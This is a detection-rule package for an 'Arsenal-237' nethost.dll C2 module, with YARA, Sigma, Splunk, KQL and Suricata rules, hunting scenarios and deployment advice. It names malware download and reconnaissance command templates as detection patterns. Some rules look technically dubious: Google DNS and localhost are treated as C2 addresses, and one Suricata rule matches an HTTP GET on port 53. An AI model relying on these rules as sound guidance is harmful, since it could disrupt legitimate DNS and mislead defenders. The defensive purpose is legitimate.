Contents
Arsenal-237 C2 Communication Module Report Date: 2026-01-26
YARA Rules
Rule 1: Arsenal-237 nethost.dll File Hash Detection
rule Arsenal237_nethost_dll_hash_detection {
meta:
author = "The Hunters Ledger"
description = "Detects Arsenal-237 nethost.dll by known file hashes"
date = "2026-01-26"
threat_level = "CRITICAL"
malware_type = "C2 Communication Module"
strings:
$sha256_1 = "158f61b6d10ea2ce78769703a2ffbba9c08f0172e37013de960d9efe5e9fde14"
$md5_1 = "f91ff1bb5699524524fff0e2587af040"
$sha1_1 = "622ddbacaf769aef383435162a203489c08c8468"
$filename = "nethost.dll" nocase
condition:
filename or any of ($sha256_*, $md5_*, $sha1_*)
}
Rule 2: Arsenal-237 nethost.dll Hardcoded C2 Detection
rule Arsenal237_nethost_dll_c2_strings {
meta:
author = "The Hunters Ledger"
description = "Detects nethost.dll by hardcoded C2 target strings"
date = "2026-01-26"
threat_level = "CRITICAL"
strings:
$c2_targets = "8.8.8.8:53127.0.0.1ntdll.dll"
$env_discovery = "COMPUTERNAMEUSERNAME"
$rust_panic = "runtime error"
$winsock_init = "WSAStartup"
condition:
($c2_targets or $env_discovery) and uint16(0) == 0x5a4d // MZ header
}
Rule 3: Arsenal-237 nethost.dll PowerShell Template Detection
rule Arsenal237_nethost_dll_powershell_templates {
meta:
author = "The Hunters Ledger"
description = "Detects nethost.dll by embedded PowerShell command templates"
date = "2026-01-26"
threat_level = "HIGH"
strings:
$ps_service = "Get-Service|?{$_.Status -eq ''}"
$ps_download = "Invoke-WebRequest -Uri '' -OutFile ''"
$upload_prefix = "pathB64:"
$response_keywords = "resultmachine_idsuccess"
condition:
3 of them and uint16(0) == 0x5a4d
}
Rule 4: Arsenal-237 nethost.dll Winsock Initialization Pattern
rule Arsenal237_nethost_dll_winsock_init {
meta:
author = "The Hunters Ledger"
description = "Detects nethost.dll by Winsock initialization pattern"
date = "2026-01-26"
threat_level = "HIGH"
strings:
$ws_startup = {C7 ?? ?? 02 02 00} // WSAStartup with version 0x202
$wsa_socket = "WSASocket"
$connect_api = "connect"
$env_vars = "COMPUTERNAME"
condition:
all of them and uint16(0) == 0x5a4d
}
Rule 5: Arsenal-237 nethost.dll Rust Compilation Signature
rule Arsenal237_nethost_dll_rust_indicators {
meta:
author = "The Hunters Ledger"
description = "Detects nethost.dll by Rust compilation indicators"
date = "2026-01-26"
threat_level = "MEDIUM"
strings:
$rust_panic = "rust_panic"
$rustc_artifact = ".rustc_artifact"
$rust_std = "std::panic"
$dlbug_assertion = "assertion `left right` failed"
$file_size = {00 C0 06 00} // 440,832 bytes
condition:
2 of them and uint16(0) == 0x5a4d
}
Sigma Detection Rules
Sigma Rule 1: Network Connection to C2 Targets
title: Arsenal-237 nethost.dll C2 Connection Attempt
description: Detects network connections to known Arsenal-237 C2 infrastructure
logsource:
category: network_connection
product: windows
detection:
c2_connection:
DestinationIp:
- 8.8.8.8
- 127.0.0.1
DestinationPort: 53
Protocol: tcp
process_filter:
Image|endswith:
- nethost.dll
- explorer.exe
- svchost.exe
- rundll32.exe
- powershell.exe
filter_legitimate:
DestinationIp: 8.8.8.8
Protocol: udp
condition: c2_connection and process_filter and not filter_legitimate
falsepositives:
- Legitimate DNS queries to Google Public DNS
- System DNS resolution to 8.8.8.8 via UDP (legitimate; TCP is suspicious)
level: critical
tags:
- attack.command_and_control
- attack.t1071
- arsenal-237
- c2_communication
Sigma Rule 2: Suspicious DLL Injection with nethost.dll
title: Arsenal-237 nethost.dll DLL Injection Attempt
description: Detects DLL injection of nethost.dll or similar network modules
logsource:
category: process_creation
product: windows
detection:
dll_injection:
CommandLine|contains:
- 'LoadLibrary*nethost.dll'
- 'GetProcAddress*WSASocket'
- 'inject*nethost'
suspicious_loader:
ParentImage|endswith:
- explorer.exe
- svchost.exe
- rundll32.exe
- regsvcs.exe
- regasm.exe
suspicious_dll_path:
Image|contains:
- '\Temp\'
- '\AppData\'
- '\Users\Public'
condition: (dll_injection or suspicious_loader) and suspicious_dll_path
falsepositives:
- Legitimate software installation procedures
level: high
tags:
- attack.defense_evasion
- attack.t1055
- arsenal-237
Sigma Rule 3: PowerShell Execution with Malware Command Templates
title: Arsenal-237 nethost.dll PowerShell Template Execution
description: Detects PowerShell execution with known malware command templates
logsource:
category: process_creation
product: windows
detection:
powershell_execution:
Image|endswith: powershell.exe
malware_templates:
CommandLine|contains:
- 'Get-Service|?{$_.Status -eq'
- 'Invoke-WebRequest -Uri'
- 'Select Name,Status|FT'
suspicious_parent:
ParentImage|endswith:
- rundll32.exe
- regsvcs.exe
- explorer.exe
- svchost.exe
condition: powershell_execution and malware_templates and suspicious_parent
falsepositives:
- Legitimate system administration scripts
level: high
tags:
- attack.execution
- attack.t1059.001
- arsenal-237
Sigma Rule 4: Environment Variable Discovery (COMPUTERNAME/USERNAME)
title: Arsenal-237 System Reconnaissance - Environment Variable Discovery
description: Detects suspicious queries for COMPUTERNAME and USERNAME environment variables
logsource:
category: process_creation
product: windows
detection:
env_discovery:
CommandLine|contains:
- 'GetEnvironmentVariable*COMPUTERNAME'
- 'GetEnvironmentVariable*USERNAME'
- '%COMPUTERNAME%'
- '%USERNAME%'
suspicious_process:
Image|endswith:
- rundll32.exe
- regsvcs.exe
- powershell.exe
- cmd.exe
filter_legitimate:
CommandLine|contains:
- 'echo %COMPUTERNAME%'
- 'hostname'
- 'whoami'
condition: env_discovery and suspicious_process and not filter_legitimate
falsepositives:
- System administration scripts
- Legitimate batch files querying environment variables
level: medium
tags:
- attack.discovery
- attack.t1082
- arsenal-237
Sigma Rule 5: Suspicious Network Reconnaissance Commands
title: Arsenal-237 System Reconnaissance Commands
description: Detects execution of reconnaissance commands (sysinfo, services, processes)
logsource:
category: process_creation
product: windows
detection:
recon_commands:
Image|endswith:
- cmd.exe
- powershell.exe
CommandLine|contains:
- 'Get-Service'
- 'Get-Process'
- 'systeminfo'
- 'tasklist'
- 'net user'
- 'wmic os get'
- 'ipconfig'
suspicious_parent:
ParentImage|endswith:
- rundll32.exe
- regsvcs.exe
- explorer.exe
- svchost.exe
sequential_execution:
selection: recon_commands and suspicious_parent
condition: sequential_execution
falsepositives:
- Legitimate system administration
- Help desk scripts
level: medium
tags:
- attack.discovery
- attack.t1057
- attack.t1082
- arsenal-237
Splunk SPL Queries
Query 1: Detect Connections to C2 Infrastructure
sourcetype=firewall OR sourcetype=wineventlog
(dest_ip=8.8.8.8 AND dest_port=53 AND protocol=tcp)
OR (dest_ip=127.0.0.1 AND dest_port=53 AND protocol=tcp)
| stats count by src_ip, dest_ip, dest_port, src_process, user
| where count >= 1
| sort - count
Use Case: Identify network connections to known Arsenal-237 C2 targets at the firewall level.
Query 2: Detect nethost.dll File Creation
sourcetype=wineventlog EventID=11
(FileName=nethost.dll OR FileName=*nethost*)
| stats count by host, FileName, TargetFilename, SourceIp
| sort - count
Use Case: Monitor for nethost.dll creation in logs (Windows EventID 11 - File Object Added to System).
Query 3: Detect PowerShell Execution with Malware Templates
sourcetype=powershell
(CommandLine="*Get-Service*" AND CommandLine="*Status -eq*")
OR (CommandLine="*Invoke-WebRequest*" AND CommandLine="*-OutFile*")
| stats count by host, CommandLine, user, process_id
| sort - count
Use Case: Hunt for PowerShell commands matching Arsenal-237 templates in PowerShell transcript logs.
Query 4: Detect Suspicious DLL Loading
sourcetype=wineventlog EventID=7 OR EventCode=7
(ImageLoaded="*nethost.dll" OR ImageLoaded="*\\Temp\\*dll")
| stats count by host, Image, ImageLoaded, SourceIp
| sort - count
Use Case: Monitor for suspicious DLL loading events (Windows EventID 7 - Image Loaded).
Query 5: Detect Process Injection from Suspicious Parents
sourcetype=wineventlog EventCode=1
(ParentImage=*rundll32.exe OR ParentImage=*regsvcs.exe OR ParentImage=*explorer.exe)
(Image=*powershell.exe OR Image=*cmd.exe)
| stats count by host, ParentImage, Image, CommandLine
| where count >= 2
| sort - count
Use Case: Identify process injection patterns suggesting malware deployment.
Query 6: Detect Reconnaissance Command Sequence
sourcetype=wineventlog EventCode=1
(Image=*cmd.exe OR Image=*powershell.exe)
(CommandLine=*systeminfo* OR CommandLine=*Get-Service* OR CommandLine=*Get-Process* OR CommandLine=*net user*)
| dedup host, user, CommandLine
| stats count by host, user, CommandLine
| where count >= 3
| sort - count
Use Case: Identify sequences of reconnaissance commands on the same host.
KQL Queries (Microsoft Sentinel / Microsoft Defender)
Query 1: Network Detection - Connections to C2 IPs
NetworkCommunication
| where RemoteIP in ("8.8.8.8", "127.0.0.1") and RemotePort == 53
| extend ThreatIndicator = "Arsenal-237-nethost-C2"
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, ThreatIndicator
| order by TimeGenerated desc
Use Case: Identify network connections to known Arsenal-237 C2 infrastructure via network telemetry.
Query 2: Process Execution - Suspicious Parent/Child Relationship
DeviceProcessEvents
| where (InitiatingProcessFileName has_any ("rundll32.exe", "regsvcs.exe", "explorer.exe"))
and (FileName has_any ("powershell.exe", "cmd.exe"))
| extend CommandLineIndicator = "T1055-ProcessInjection"
| project TimeGenerated, DeviceName, InitiatingProcessFileName, FileName, CommandLine, CommandLineIndicator
| order by TimeGenerated desc
Use Case: Detect suspicious parent-child process relationships suggesting DLL injection.
Query 3: File Creation - nethost.dll Detection
DeviceFileEvents
| where FileName == "nethost.dll" or FileName endswith "nethost.dll"
| extend ThreatIndicator = "Arsenal-237-nethost-DLL"
| project TimeGenerated, DeviceName, FileName, FolderPath, InitiatingProcessFileName, ThreatIndicator
| order by TimeGenerated desc
Use Case: Identify nethost.dll file creation or modification events.
Query 4: PowerShell Execution - Malware Command Templates
DeviceProcessEvents
| where FileName == "powershell.exe"
| where CommandLine contains "Get-Service" and CommandLine contains "Status -eq"
or CommandLine contains "Invoke-WebRequest" and CommandLine contains "-OutFile"
| extend ThreatIndicator = "Arsenal-237-PowerShell-Template"
| project TimeGenerated, DeviceName, CommandLine, ProcessId, InitiatingProcessFileName, ThreatIndicator
| order by TimeGenerated desc
Use Case: Hunt for PowerShell commands matching Arsenal-237 templates in process telemetry.
Query 5: Registry Persistence Check
DeviceRegistryEvents
| where RegistryKey has_any (
@"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
@"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
@"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
)
| where RegistryValueData contains "nethost" or RegistryValueData contains "cmd"
| extend ThreatIndicator = "Arsenal-237-Persistence"
| project TimeGenerated, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, ThreatIndicator
| order by TimeGenerated desc
Use Case: Identify suspicious registry persistence mechanisms associated with Arsenal-237.
Suricata Network Signatures
Signature 1: Detect Connections to C2 Addresses (Port 53/TCP)
alert tcp any any -> 8.8.8.8 53 (
msg:"Arsenal-237 nethost.dll C2 Connection Attempt to 8.8.8.8:53";
flow:established;
content:"GET"; http_method;
sid:1001001; rev:1;
classtype:trojan-activity;
metadata: policy balanced-ips drop, policy security-ips alert;
)
alert tcp any any -> 127.0.0.1 53 (
msg:"Arsenal-237 nethost.dll C2 Connection Attempt to localhost:53";
flow:established;
sid:1001002; rev:1;
classtype:trojan-activity;
metadata: policy balanced-ips drop, policy security-ips alert;
)
Signature 2: Detect Suspicious DNS-over-TCP (Port 53/TCP)
alert tcp any any -> any 53 (
msg:"Suspicious DNS-over-TCP from suspicious process";
flow:established;
content:"|00|"; depth:1;
pcre:"/^[^\x00-\x09\x0b\x0c\x0e-\x1f\x7f-\xff]*$/";
sid:1001003; rev:1;
classtype:trojan-activity;
)
Threat Hunting Playbook
Hunting Scenario 1: Find All Instances of nethost.dll
Objective: Locate all instances of nethost.dll across your infrastructure.
Tools: YARA, EDR, File Share Scanning
Procedure:
- Deploy YARA rule “Arsenal237_nethost_dll_hash_detection” across all endpoints
- Query file shares and backups for nethost.dll
- Review EDR logs for any DLL load events matching nethost.dll
- Correlate findings with process execution logs
Expected Result: Comprehensive inventory of nethost.dll instances; if any found, escalate to incident response.
Hunting Scenario 2: Find All Connections to C2 Infrastructure
Objective: Identify any network connections to 8.8.8.8:53 or 127.0.0.1:53.
Tools: Firewall, Proxy, Network Monitoring, EDR
Procedure:
- Query firewall logs for any connections to 8.8.8.8:53 (TCP) or 127.0.0.1:53 (TCP)
- Query proxy logs for similar connections
- Query EDR for network connection telemetry matching these addresses
- For each connection found, identify source process and system
Expected Result: List of systems attempting C2 connections; investigate each for malware presence.
Hunting Scenario 3: Find PowerShell Execution with Malware Templates
Objective: Identify PowerShell execution patterns matching Arsenal-237 templates.
Tools: PowerShell Transcript Logging, EDR, SIEM
Procedure:
-
Search PowerShell transcripts for commands containing “Get-Service ?{$_.Status -eq” - Search for commands containing “Invoke-WebRequest -Uri ‘’ -OutFile ‘’”
- For each match, identify parent process and user context
- Cross-reference with process creation logs
Expected Result: List of systems executing malware templates; investigate for compromise.
Hunting Scenario 4: Find Suspicious DLL Injection Events
Objective: Identify DLL injection patterns potentially associated with nethost.dll deployment.
Tools: EDR, Event Logging (Sysmon), SIEM
Procedure:
- Search Event ID 7 (Image Loaded) for DLL loads from suspicious paths (%Temp%, %AppData%)
- Identify parent processes: rundll32.exe, regsvcs.exe, explorer.exe, svchost.exe
- Look for DLL names: nethost, network, host, c2
- For each match, check for subsequent network connections
Expected Result: List of suspicious DLL injection events; escalate those with network communication.
Hunting Scenario 5: Find Environment Variable Discovery Patterns
Objective: Identify systems querying COMPUTERNAME/USERNAME in suspicious context.
Tools: EDR, PowerShell Transcript Logging, Event Logs
Procedure:
- Search for processes querying GetEnvironmentVariable(COMPUTERNAME) or GetEnvironmentVariable(USERNAME)
- Identify parent processes and context
- Look for immediate network connection attempts following variable queries
- Cross-reference with C2 connection list from Hunting Scenario 2
Expected Result: Systems performing reconnaissance; correlate with C2 connections for high-confidence detections.
Detection Coverage Matrix
| Detection Method | Coverage | Reliability | Ease of Evasion |
|---|---|---|---|
| File Hash (YARA) | Exact variant detection | HIGH | HIGH (recompilation evades) |
| String Signatures (YARA) | Hardcoded C2, templates | HIGH | MEDIUM (recompilation evades) |
| Network Signature (Suricata) | C2 connections | VERY HIGH | MEDIUM (new C2 evades) |
| Behavioral Detection (EDR) | Suspicious process behavior | HIGH | LOW (behavior patterns consistent) |
| PowerShell Transcript Analysis | Command execution tracking | HIGH | MEDIUM (obfuscation bypasses) |
| DNS Sinkhole | C2 domain resolution | HIGH | MEDIUM (new domains evade) |
| Registry Monitoring | Persistence mechanisms | MEDIUM | LOW (no registry persistence) |
| Process Injection Detection | DLL injection patterns | MEDIUM | MEDIUM (alternative methods bypass) |
Recommended Detection Deployment Priority
PHASE 1 (Days 1-3) - Emergency Detection:
- Deploy network signatures to block 8.8.8.8:53 and 127.0.0.1:53 outbound connections
- Deploy YARA file hash detection across all endpoints
- Deploy Sigma network connection rule to SIEM
PHASE 2 (Days 4-7) - Behavioral Detection:
- Deploy PowerShell transcript logging and analysis
- Deploy EDR behavioral detection rules for process injection
- Deploy Sigma detection rules for reconnaissance commands
PHASE 3 (Weeks 2-4) - Long-Term Hardening:
- Implement DNS sinkhole for known C2 domains
- Deploy next-generation firewall with C2 detection
- Establish continuous threat hunting schedule
False Positive Management
Expected False Positives:
- Legitimate Google DNS usage (8.8.8.8 port 53 UDP) - Filter out UDP traffic
- System administration scripts querying environment variables
- Standard PowerShell administration (Get-Service usage)
Tuning Recommendations:
- Filter out UDP to 8.8.8.8:53 (legitimate DNS) - focus on TCP
- Exclude known administrative PowerShell scripts from alerting
- Establish baseline for each organization’s legitimate environment variable queries
- Implement confidence levels rather than binary alerting
Integration with Security Tools
SIEM Integration
- Import Sigma rules into Splunk, Elastic, or Microsoft Sentinel
- Configure SPL/KQL queries for continuous monitoring
- Set up alerting thresholds and escalation procedures
EDR Integration
- Deploy YARA/Sigma detection rules to endpoint agents
- Configure incident response automation for high-confidence detections
- Enable process tree visualization for parent-child relationship analysis
Firewall Integration
- Create firewall rules to block 8.8.8.8:53 and 127.0.0.1:53
- Enable logging for all connection attempts (even if blocked)
- Alert on repeated connection attempts indicating persistence
DNS Sinkhole
- Add known C2 domains to sinkhole blocklist
- Monitor for queries to C2 domains by suspicious processes
- Alert on sinkhole hits for rapid incident response
Metrics & Effectiveness Tracking
Track the following metrics to assess detection effectiveness:
- Detection Rate: Percentage of known infected systems detected
- Time to Detection: Average time from compromise to detection alert
- False Positive Rate: Percentage of benign alerts vs. true positives
- MTTR (Mean Time to Response): Average time from alert to incident response
- Coverage: Percentage of infrastructure covered by each detection method
Goal: Achieve 95%+ detection rate with <5% false positive rate within 30 days of deployment.
License
Detection rules are licensed under Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0).
Free to use in your environment, but not for commercial purposes.